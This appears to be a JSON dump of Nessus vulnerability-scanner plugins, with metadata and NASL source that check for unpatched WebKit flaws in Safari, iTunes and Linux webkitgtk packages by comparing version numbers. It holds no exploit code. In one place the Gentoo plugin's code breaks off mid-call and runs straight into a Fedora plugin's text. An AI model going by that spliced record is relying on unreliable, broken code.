is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(11|12|13)([^0-9]|$)\", string:os))\n{\n audit(AUDIT_OS_NOT, \"Mac OS X El Capitan 10.11 / macOS Sierra 10.12 / macOS High Sierra 10.13\");\n} \n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"11.0.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:38:21", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.2. 
It is, therefore, affected by multiple vulnerabilities in webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-08T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105651", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105651);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-13856\",\n \"CVE-2017-13866\",\n \"CVE-2017-13870\"\n );\n script_bugtraq_id(102181, 102192);\n\n 
script_name(english:\"Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.2. It is, therefore, affected by multiple vulnerabilities \nin webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208326\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script 
is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.7.2\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:38:17", "description": "The remote host is affected by the vulnerability described in GLSA-201801-09 (WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebkitGTK+. Please review the referenced CVE Identifiers for details.\n Impact :\n\n An attacker, by enticing a user to visit maliciously crafted web content, may be able to execute arbitrary code or cause memory corruption.\n Workaround :\n\n There are no known workarounds at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-08T00:00:00", "type": "nessus", "title": "GLSA-201801-09 : WebkitGTK+: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157"], "modified": "2018-01-26T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201801-09.NASL", "href": "https://www.tenable.com/plugins/nessus/105635", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201801-09.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105635);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/01/26 17:15:58 $\");\n\n script_cve_id(\"CVE-2017-13856\", \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-7156\", \"CVE-2017-7157\");\n script_xref(name:\"GLSA\", value:\"201801-09\");\n\n script_name(english:\"GLSA-201801-09 : WebkitGTK+: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201801-09\n(WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebkitGTK+. 
Please\n review the referenced CVE Identifiers for details.\n \nImpact :\n\n An attacker, by enticing a user to visit maliciously crafted web\n content, may be able to execute arbitrary code or cause memory\n corruption.\n \nWorkaround :\n\n There are no known workarounds at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201801-09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All WebkitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.18.4:4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 
[CVE-2017-7153](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7153),\n [CVE-2017-7161](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7161),\n [CVE-2018-4096](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4096)\n\nAdditional fixes :\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Several fixes and improvements in WebDriver.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-43712163de\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"webkitgtk4-2.18.6-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:36:46", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2018-4088](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4088), [CVE-2017-13885](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13885), [CVE-2017-7165](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7165), [CVE-2017-13884](https://cve.mitre.org/cgi-bin/cvename.c 
gi?name=CVE-2017-13884), [CVE-2017-7160](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7160), [CVE-2017-7153](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7153), [CVE-2017-7161](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7161), [CVE-2018-4096](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4096)\n\nAdditional fixes :\n\n - Fix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\n - Several fixes and improvements in WebDriver.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-29T00:00:00", "type": "nessus", "title": "Fedora 27 : webkitgtk4 (2018-3199135a7e)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2021-01-06T00:00:00", 
"cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-3199135A7E.NASL", "href": "https://www.tenable.com/plugins/nessus/106418", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-3199135a7e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106418);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4096\");\n script_xref(name:\"FEDORA\", value:\"2018-3199135a7e\");\n\n script_name(english:\"Fedora 27 : webkitgtk4 (2018-3199135a7e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4088](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4088),\n [CVE-2017-13885](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13885),\n [CVE-2017-7165](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7165),\n [CVE-2017-13884](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13884),\n [CVE-2017-7160](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7160),\n [CVE-2017-7153](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7153),\n [CVE-2017-7161](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7161),\n [CVE-2018-4096](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4096)\n\nAdditional fixes :\n\n - Fix deadlock in GStreamer video sink during 
shutdown\n when accelerated compositing is disabled.\n\n - Several fixes and improvements in WebDriver.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-3199135a7e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"webkitgtk4-2.18.6-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-13T14:30:16", "description": "Multiple security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof the user interface, or execute arbitrary code. 
(CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160, CVE-2017-7161, CVE-2017-7165, CVE-2017-13884, CVE-2017-13885).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-31T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 17.10 : webkit2gtk vulnerabilities (USN-3551-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "UBUNTU_USN-3551-1.NASL", "href": "https://www.tenable.com/plugins/nessus/106534", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text 
and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3551-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106534);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4096\");\n script_xref(name:\"USN\", value:\"3551-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.10 : webkit2gtk vulnerabilities (USN-3551-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Multiple security issues were discovered in the WebKitGTK+ Web and\nJavaScript engines. If a user were tricked in to opening a specially\ncrafted website, an attacker could potentially exploit these to cause\na denial of service, spoof the user interface, or execute arbitrary\ncode. (CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160,\nCVE-2017-7161, CVE-2017-7165, CVE-2017-13884, CVE-2017-13885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3551-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. 
